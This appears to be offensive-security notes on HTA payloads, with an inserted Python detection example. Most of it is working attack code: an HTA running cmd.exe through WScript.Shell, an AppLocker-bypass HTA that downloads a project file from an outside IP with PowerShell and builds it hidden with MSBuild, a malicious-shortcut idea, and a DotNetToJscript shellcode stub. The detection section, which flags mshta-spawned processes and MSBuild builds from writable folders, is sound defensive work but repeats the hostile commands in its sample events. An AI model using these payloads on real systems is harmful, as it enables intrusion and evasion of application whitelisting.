HTA

Simple code template:

<html>
<body>
<script>
	var c= 'cmd.exe'
	new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

This variant is useful for bypassing AppLocker: it downloads a project file to C:\Windows\Tasks and builds it with MSBuild.exe.

<html>
<body>
<script>
	var c= "powershell iwr http://192.168.19.134/pwsh.csproj -OutFile C:\\Windows\\Tasks\\pwsh.csproj;powershell -w hidden C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe /nologo /noconsolelogger C:\\Windows\\Tasks\\pwsh.csproj";
	new ActiveXObject('WScript.Shell').Run(c);window.close();
</script>
</body>
</html>
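Seen from the detection side, the template above leaves a recognisable process tree: mshta.exe as an ancestor of PowerShell and MSBuild, and MSBuild building a project from C:\Windows\Tasks. The following is an added example, not part of the original notes; the event field names, the sample events and the list of writable directories are assumptions made for illustration.

```python
import ntpath
import re
# Constructed process-creation events (Sysmon Event ID 1 style); field names are assumptions.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta.exe C:\Users\bob\Downloads\invoice.hta"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell iwr http://192.0.2.10/pwsh.csproj -OutFile C:\Windows\Tasks\pwsh.csproj;..."},
    {"pid": 310, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -w hidden C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe ..."},
    {"pid": 320, "ppid": 310, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmd": r"MSBuild.exe /nologo /noconsolelogger C:\Windows\Tasks\pwsh.csproj"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmd": r"MSBuild.exe C:\src\app\app.csproj"},  # benign developer build
]

WATCHED = {"cmd.exe", "powershell.exe", "msbuild.exe"}  # children used by the HTA templates
WRITABLE_DIRS = (r"c:\windows\tasks", r"c:\windows\temp", r"c:\users\public")  # assumed list
PROJECT_RE = re.compile(r"(\S+\.(?:csproj|proj|xml))", re.I)

def name_of(image):
    return ntpath.basename(image).lower()

def has_mshta_ancestor(pid, by_pid):
    """Walk parent links; 'seen' guards against loops caused by PID reuse."""
    seen, ev = {pid}, by_pid.get(pid)
    while ev and ev["ppid"] in by_pid and ev["ppid"] not in seen:
        seen.add(ev["ppid"])
        ev = by_pid[ev["ppid"]]
        if name_of(ev["image"]) == "mshta.exe":
            return True
    return False

def detect(events):
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = name_of(e["image"])
        if name in WATCHED and has_mshta_ancestor(e["pid"], by_pid):
            alerts.append((e["pid"], "mshta_descendant"))
        if name == "msbuild.exe" and any(
                p.lower().startswith(WRITABLE_DIRS) for p in PROJECT_RE.findall(e["cmd"])):
            alerts.append((e["pid"], "msbuild_project_in_writable_dir"))
    return alerts

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(pid, rule)
```

Walking the full ancestry matters here because MSBuild is launched by an intermediate PowerShell process, so a parent-only check against mshta.exe would miss it.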

Shortcut

Create a shortcut that downloads and executes a hosted HTA file when the user clicks it.

DotNetToJscript with HTA

<html> 
<head> 
<script language="JScript">
DotNetToJscript - SHELLCODE
</script>
</head> 
<body>
<script language="JScript">
self.close();
</script>
</body> 
</html>
